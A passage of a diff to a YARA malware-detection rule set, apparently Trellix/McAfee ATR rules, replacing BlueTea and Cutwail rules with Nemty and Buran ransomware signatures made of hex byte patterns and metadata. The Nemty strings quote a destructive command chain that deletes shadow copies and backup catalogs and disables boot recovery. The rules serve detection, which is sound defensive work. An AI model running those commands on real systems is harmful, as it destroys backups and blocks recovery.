7F454C4602010100000000000000000002003E000100000090D34500000000004000000000000000C8010000000000000000000040003800070040000D000300060000000400000040000000000000004000400000000000400040000000000088010000000000008801000000000000001000000000000004000000040000009C0F0000000000009C0F4000000000009C0F400000000000640000000000000064000000000000000400000000000000010000000500000000000000000000000000400000000000000040000000000083F23E000000000083F23E00000000000010000000000000010000000400000000003F000000000000007F000000000000007F00000000006C834500000000006C834500000000000010000000000000010000000600000000908400000000000090C400000000000090C4000000000060EC0400000000005809070000000000001000000000000051E574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000080150465002A000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000006000000000000000010400000000000001000000000000083E23E00000000000000000000000000100000000000000000000000000000004100000001000000020000000000000000007F000000000000003F0000000000C0271B0000000000000000000000000020000000000000000000000000000000720000000300000000000000000000000000000000000000C0275A00000000007C000000000000000000000000000000010000000000000000000000000000004900000001000000020000000000000040289A000000000040285A0000000000D83600000000000000000000000000002000000000000000000000000000000053000000010000000200000000000000185F9A0000000000185F5A0000000000380D0000000000000000000000000000080000000000000000000000000000005D000000010000000200000000000000506C9A0000000000506C5A0000000000000000000000000000000000000000000100000000000000000000000000000067000000010000000200000000000000606C9A0000000000606C5A00000000000C172A0000000000000000000000000020000000000000000000000000000000070000000100000003000000000000000090C400000000000090840000000000004B0300000000000000000000000000200000000000000000000000000000001200000001000000030000000000000000DBC7000000000000DB87000000000050A101000000000000000000000000002000000000000000000000000000000018000000080000000300000000000000607CC90000000000607C890000000000D0E80100000000000000000000000000200000000000000000000000000000001D0000000800000003000000000000004065CB000000000040658B00000000001834000000000000000000000000000020000000000000000000000000000000270000000700000002000000000000009C0F4000000000009C0F00000000000064000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 } + $x1 = "/c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default}" fullword ascii + $s2 = "https://pbs.twimg.com/media/Dn4vwaRW0AY-tUu.jpg:large :D" fullword ascii + $s3 = "MSDOS.SYS" fullword wide + $s4 = "/c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} " ascii + $s5 = "recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete" fullword ascii + $s6 = "DECRYPT.txt" fullword ascii + $s7 = "pv3mi+NQplLqkkJpTNmji/M6mL4NGe5IHsRFJirV6HSyx8mC8goskf5lXH2d57vh52iqhhEc5maLcSrIKbukcnmUwym+In1OnvHp070=" fullword ascii + $s8 = "\\NEMTY-DECRYPT.txt\"" fullword ascii + $s9 = "rfyPvccxgVaLvW9OOY2J090Mq987N9lif/RoIDP89luS9Ouv9gUImpgCTVGWvJzrqiS8hQ5El02LdEvKcJ+7dn3DxiXSNG1PwLrY59KzGs/gUvXnYcmT6t34qfZmr8g8" ascii + $s10 = "IO.SYS" fullword wide + $s11 = "QgzjKXcD1Jh/cOLBh1OMb+rWxUbToys2ArG9laNWAWk0rNIv2dnIDpc+mSbp91E8qVN8Mv8K5jC3EBr4TB8jh5Ns/onBhPZ9rLXR7wIkaXGeTZi/4/XOtO3DFiad4+vf" ascii + $s12 = "NEMTY-DECRYPT.txt" fullword wide + $s13 = "pvXmjPQRoUmjj0g9QZ24wvEqyvcJVvFWXc0LL2XL5DWmz8me5wElh/48FHKcpbnq8C2kwQ==" fullword ascii + $s14 = "a/QRAGlNLvqNuONkUWCQTNfoW45DFkZVjUPn0t3tJQnHWPhJR2HWttXqYpQQIMpn" fullword ascii + $s15 = "KeoJrLFoTgXaTKTIr+v/ObwtC5BKtMitXq8aaDT8apz98QQvQgMbncLSJWJG+bHvaMhG" fullword ascii + $s16 = "pu/hj6YerUnqlUM9A8i+i/UhnvsIE+9XTYs=" fullword ascii + $s17 = "grQkLxaGvL0IBGGCRlJ8Q4qQP/midozZSBhFGEDpNElwvWXhba6kTH1LoX8VYNOCZTDzLe82kUD1TSAoZ/fz+8QN7pLqol5+f9QnCLB9QKOi0OmpIS1DLlngr9YH99vt" ascii + $s18 = "BOOTSECT.BAK" fullword wide + $s19 = "bbVU/9TycwPO+5MgkokSHkAbUSRTwcbYy5tmDXAU1lcF7d36BTpfvzaV5/VI6ARRt2ypsxHGlnOJQUTH6Ya//Eu0jPi/6s2MmOk67csw/msiaaxuHXDostsSCC+kolVX" ascii + $s20 = "puh4wXjVYWJzFN6aIgnClL4W/1/5Eg6bm5uEv6Dru0pfOvhmbF1SY3zav4RQVQTYMfZxAsaBYfJ+Gx+6gDEmKggypl1VcVXWRbxAuDIXaByh9aP4B2QvhLnJxZLe+AG5" ascii condition: - uint16(0)==0x457f and filesize <26000KB and all of them + ( uint16(0)==0x5a4d and filesize <400KB and (1 of ($x*) and 4 of them )) } -rule TRELLIX_ARC_Rtf_Bluetea_Builder : MALDOC FILE +rule TRELLIX_ARC_Nemty_Ransomware_2_6 : RANSOMWARE FILE { meta: - description = "Rule to detect the RTF files created to distribute BlueTea trojan" + description = "Rule to detect Nemty Ransomware version 2.6" author = "Marc Rivero | McAfee ATR Team" - id = "20e4f7b2-b36c-5724-a3aa-4216ed6265ab" - date = "2020-04-21" + id = "335dff33-d078-58ba-b68b-a949895b710f" + date = "2020-04-06" modified = "2020-08-14" - reference = "https://blog.360totalsecurity.com/en/bluetea-action-drive-the-life-trojan-update-email-worm-module-and-spread-through-covid-19-outbreak/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALDOC_rtf_bluetea_builder.yar#L1-L30" + reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Nemty.yar#L47-L80" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "4a3eeaed22342967a95302a4f087b25f50d61314facc6791f756dcd113d4f277" - logic_hash = "6c4007fb7ef4819141db63050215dcbb3d2c17e7cdcdbb6cfb4f4b045bb5736b" + hash = "52b7d20d358d1774a360bb3897a889e14d416c3b2dff26156a506ff199c3388d" + logic_hash = "dacf709838ef2ef65d25bdbbd92007ab46a95953031d7bee75eac046f670171a" score = 75 quality = 70 - tags = "MALDOC, FILE" + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "maldoc" - malware_family = "Maldoc:W32/BlueTea" + malware_type = "ransomware" + malware_family = "Ransom:W32/Nemty" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $sequence = { 7B??72??6631??????65666C616E6731??32??????????69??????????????67????36??75??32??????656666????35????????656666????????73??666462????33??35????????74??68????????68????????36??73??73??66??????68????????36??73??73??6662????5C646566??616E6731??33??5C646566??616E67666532??35????????656D656C616E6731??33??5C74??656D656C616E67666532??35????????656D656C616E6763????7B??666F6E74??62??????6630??????69??????????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????0A????6631??5C6662????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??5C6633????6662????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??34??35????????30????3630??30??30????????????72??6120????74??3B????0A????6633??5C6662????69??????????69????????????6172??6574??5C6670??71??7B??2A??????6E6F73??20??32??6630??????????30??30????33??32??34??43616C69????????????5C6633??5C6662????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??5C2763????2763????2763????276535????????7B??666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C666462????6A??72??6633??35????????62????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??34??35????????30????3630??30??30????????????72??613B????5C6662????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????0A????666C6F6D69????????????31??????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C666462????6E6F72??6633??35????????62????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??0A????66??????69????????????31??????????62????69??????????69????????????6172??6574??5C6670??71??7B??2A??????6E6F73??20??32??6630??????????30??30????33??32??34??43616C69????????????5C6662????69????????????31??????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C6634??5C6662????69??????????6D616E5C6663????72??6574??33??5C6670??71??20??????6573??4E6577??526F6D616E20????3B????0A????6634??5C6662????69??????????6D616E5C6663????72??6574??30????6670??71??20??????6573??4E6577??526F6D616E20????72??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??3631??????72??32??5469????????????77??526F6D616E20????6565??????7B??6634??5C6662????69??????????6D616E5C6663????72??6574??3632??????72??32??5469????????????77??526F6D616E20??????3B????5C6634??5C6662????69??????????6D616E5C6663????72??6574??37375C6670??71??20??????6573??4E6577??526F6D616E20??486562????77??3B????0A????6634??5C6662????69??????????6D616E5C6663????72??6574??3738??????72??32??5469????????????77??526F6D616E20??4172??62????29??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??38??5C6670??71??20??????6573??4E6577??526F6D616E20????6C74??63??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??3633??????72??32??5469????????????77??526F6D616E20??5669????????????73??29??7D??0A????6631??32??????69??????????????6C5C6663????72??6574??5C6670??71??20????6D5375??20????73??6572??7B??2A??????6C74??5369????????????7D??5C6633??30??????69??????????????6D616E5C6663????72??6574??33??5C6670??71??20????6D62????6120????74??20????3B????5C6633??31??????69??????????????6D616E5C6663????72??6574??30????6670??71??20????6D62????6120????74??20????72??7D??5C6633??33??????69??????????????6D616E5C6663????72??6574??3631??????72??32??43616D62????6120????74??20????6565??????0D????????33??34??6662????69??????????6D616E5C6663????72??6574??3632??????72??32??43616D62????6120????74??20??????3B????5C6633??375C6662????69??????????6D616E5C6663????72??6574??38??5C6670??71??20????6D62????6120????74??20????6C74??63??7D??5C6633??38??????69??????????????6D616E5C6663????72??6574??3633??????72??32??43616D62????6120????74??20??5669????????????73??29??7D??5C6634??30??????69??????????????69????????????6172??6574??33??5C6670??71??20????6C69????????????3B????0A????6634??31??????69??????????????69????????????6172??6574??30????6670??71??20????6C69????????????72??7D??5C6634??33??????69??????????????69????????????6172??6574??3631??????72??32??43616C69????????????6565??????7B??6634??34??6662????69??????????69????????????6172??6574??3632??????72??32??43616C69????????????72??7D??5C6634??375C6662????69??????????69????????????6172??6574??38??5C6670??71??20????6C69????????????6C74??63??7D??0A????6634??38??????69??????????????69????????????6172??6574??3633??????72??32??43616C69????????????69????????????73??29??7D??5C6634??32??????69??????????????6C5C6663????72??6574??5C6670??71??20????2763????2763????2763????276535????????74??72??3B????5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??33??5C6670??71??20??????6573??4E6577??526F6D616E20????3B????0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??30????6670??71??20??????6573??4E6577??526F6D616E20????72??7D??5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3631??????72??32??5469????????????77??526F6D616E20????6565??????7B??666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3632??????72??32??5469????????????77??526F6D616E20??????3B????0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??37375C6670??71??20??????6573??4E6577??526F6D616E20??486562????77??3B????5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3738??????72??32??5469????????????77??526F6D616E20??4172??62????29??7D??5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??38??5C6670??71??20??????6573??4E6577??526F6D616E20????6C74??63??7D??0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3633??????72??32??5469????????????77??526F6D616E20??5669????????????73??29??7D??5C666462????6A??72??6633??35????????62????69??????????6C5C6663????72??6574??5C6670??71??20????6D5375??20????73??6572??7B??2A??????6C74??5369????????????7D??5C66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??33??5C6670??71??20????6D62????6120????3B????0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??30????6670??71??20????6D62????6120????72??7D??5C66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3631??????72??32??43616D62????6120????6565??????7B??66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3632??????72??32??43616D62????6120??????3B????0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??38??5C6670??71??20????6D62????6120????6C74??63??7D??5C66??????616A?? } + $pattern = { 558B??83????53565789????29????6A??8D????8D????5A8B??89????8A????88????8B????8A????88??8A????88????8A??88????03??03??FF????75??89????8D????8D????8D????89????89????29????89????29????89????29????8D????8D????89????29????89????29????8B????89????29????8D????F6??????8B????8A????8B????8A????8A??88????8B????8A????88????75??0FB6??8A??????????0FB6??88????8A??????????0FB6????8A??????????88????0FB6????8A??????????88????8B????C1????32??????????8B????8A????32??8B????88????8A????32??88????8A??32????83????88????8B????8A????32????FF????88??83????83????83??????0F82????????5F5E5BC9C3558B??560FB6??57C1????03????6A??5F6A??5E8A??30??40414E75??4F75??5F5E5DC356576A??5F6A??8B??5E0FB6??8A??????????88??83????4E75??414F75??5F5EC38A????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????88????C3558B??5153566A??83????5E8A????32??8A????8A????88????32??32??88????88????32??8A??C0????B3??F6??02??32??32????8A????32????32??88????8A??C0????F6??02??32??32????8A????32????88????8A??C0????F6??02??32??32??8A????32????32????88??8A??C0????F6??02??32??32????83????32????4E88????75??5E5BC9C3558B??53FF????8B??32??E8????????59B3??8B??E8????????8B??E8????????8B??E8????????FF????8B??8A??E8????????FE??5980????72??8B??E8????????8B??E8????????5B8B??B0??5DE9????????558B??81??????????A1????????33??89????8B????578D??????????89??????????E8????????33??6A??5839????76??5683????75??508D????5350E8????????8D??????????508D????E8????????83????6A??5880??????75??C6??????4879??EB??FE????33??8A??????8B??????????30????47403B????72??5E8B????33??5FE8????????C9C3558B??51515333??5633??32??89????39????0F86????????578B????8B????8A????8B??83????74??4F74??4F75??21????0FB6??0FB6??83????8B??C1????C1????0B??8A??????????83????88????8A??????????8B????88??????83????EB??0FB6??0FB6??83????6A??C1????C1????5E0B??EB??33??0FB6??46C1????8A??????????88????40FF????8A??8B????3B????72??5F4E74??4E75??0FB6??83????8A????????????88????C6????????83????EB??0FB6??83????C1????8A??????????88????66????????????83????5EC6??????5BC9C3558B??33??F6??????75??5733??39????76??8B????8A????80????74??80????7C??80????7F??0FB6??8A??????????80????74??8B??83????83????74??4A74??4A74??4A75??08????40EB??8A??C0????80????08????40C0????EB??8A??C0????80????08????40C0????EB??C0????88????473B????72??EB??33??5F5DC3558B??518B??85??74??8B????568B??89????3B??74??576A??33??E8????????83????3B????75??5FFF??E8????????595E33??89??89????89????C9C3558B??80??????74??83??????72??538B??85??74??575356E8????????83????53E8????????595BC7????????????89????C6??????5DC2????C7??????????E9????????558B??568B??C7??????????E8????????F6??????74??56E8????????598B??5E5DC2????558B??83????81??????????A1????????33??89????????????5356578D????508D??????E8????????68????????8D????????????E8????????6A??5F33??83????66????????8D????8B??33??5089??????89??????E8????????E8????????33??66????????8B????????????03??????83????8D??????89??????89??????E8????????538D??????5083????8D??????E8????????538D????????????5083????E8????????8B??8D??????E8????????6A??33??E8????????83????????8B??????73??8D??????8D????????????5150FF??????????89??????83????0F84????????8B??????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????68????????8D????????????50FF??85??0F84????????F6??????????????8D????????????508D??????8D??????74??E8????????598D??????51E8????????8B??598D??????E8????????6A??33??8D??????E8????????6A??8D??????E8????????83????8D??????8B??50E8????????E8????????83????E9????????E8????????8B??598D??????E8????????6A??33??8D??????E8????????8D????????????50FF??????????508D??????E8????????8B??????6A??5F39??????73??8D??????8B??????????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??0F84????????8B??????39??????73??8D??????68????????50FF??85??74??8B??????39??????73??8D??????68????????50FF??85??74??83????8B??68????????E8????????83????8D????????????8B??51E8????????E8????????83????85??75??8B??????39??????73??8D??????83????8B??51E8????????E8????????83????6A??33??8D??????E8????????8D????????????50FF??????FF??????????85??0F85????????FF??????FF??????????33??435333??8D?????? } condition: - uint16(0)==0x5c7b and filesize <100KB and all of them + uint16(0)==0x5a4d and filesize <1500KB and $pattern } -rule TRELLIX_ARC_Malw_Cutwail_Pdb : BOTNET FILE +rule TRELLIX_ARC_Buran_Ransomware : RANSOMWARE FILE { meta: - description = "Rule to detect cutwail based on the PDB" + description = "Rule to detect Buran ransomware" author = "Marc Rivero | McAfee ATR Team" - id = "62058ff9-acb5-5f71-b6bb-4c64e51442ba" - date = "2008-04-16" + id = "b96c0e5c-dce2-559d-9623-81e8a9a322f2" + date = "2019-11-05" modified = "2020-08-14" - reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/CUTWAIL" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_cutwail.yar#L1-L25" + reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Buran.yar#L1-L27" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "d702f823eefb50d9ea5b336c638f65a40c2342f8eb88278da60aa8a498c75010" - logic_hash = "f53626e6085509ddf9268b69e54a138e64cd5d3fbad119e6e9473179decd7927" + logic_hash = "056cf2e6aca22876fb8bfafc14a3be0e42124a26edab42a6f7a928c87fb8fff4" score = 75 quality = 70 - tags = "BOTNET, FILE" + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "botnet" - malware_family = "Botnet:W32/Cutwail" + malware_type = "ransomware" + malware_family = "Ransom:W32/Buran" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pdb = "\\0bulknet\\FLASH\\Release\\flashldr.pdb" + $s1 = { 5? 8B ?? 81 C? ?? ?? ?? ?? 5? 5? 5? 33 ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? C6 ?? ?? ?? ?? ?? ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? 8D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B ?? ?? E8 ?? ?? ?? ?? 5? E8 ?? ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 84 ?? 0F 85 } + $s2 = { 4? 33 ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? 8B ?? FF 5? ?? FF 7? ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 5? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 5? E8 ?? ?? ?? ?? 85 ?? 74 } + $s3 = { A1 ?? ?? ?? ?? 99 5? 5? A1 ?? ?? ?? ?? 99 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 03 ?? ?? 13 ?? ?? ?? 83 ?? ?? E8 ?? ?? ?? ?? 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 03 ?? ?? 13 ?? ?? ?? 83 ?? ?? 89 ?? ?? 89 ?? ?? A1 ?? ?? ?? ?? 99 5? 5? 8B ?? ?? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? 03 ?? ?? ?? 13 ?? ?? ?? 89 ?? ?? 89 ?? ?? A1 ?? ?? ?? ?? 4? 99 89 ?? ?? 89 ?? ?? FF 7? ?? FF 7? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 3B ?? ?? 75 } + $s4 = { 5? 5? 5? 5? 8B ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? 68 ?? ?? ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? 89 ?? ?? 8D ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? ?? 0F 84 } + $s5 = { 5? 8B ?? 83 ?? ?? 5? 5? 5? 89 ?? ?? 8B ?? 89 ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 83 ?? ?? 83 ?? ?? 5? 5? A1 ?? ?? ?? ?? 99 E8 ?? ?? ?? ?? 89 ?? ?? E8 ?? ?? ?? ?? 89 ?? ?? E8 ?? ?? ?? ?? 89 ?? ?? 8B ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? 8B ?? ?? 8B ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? E8 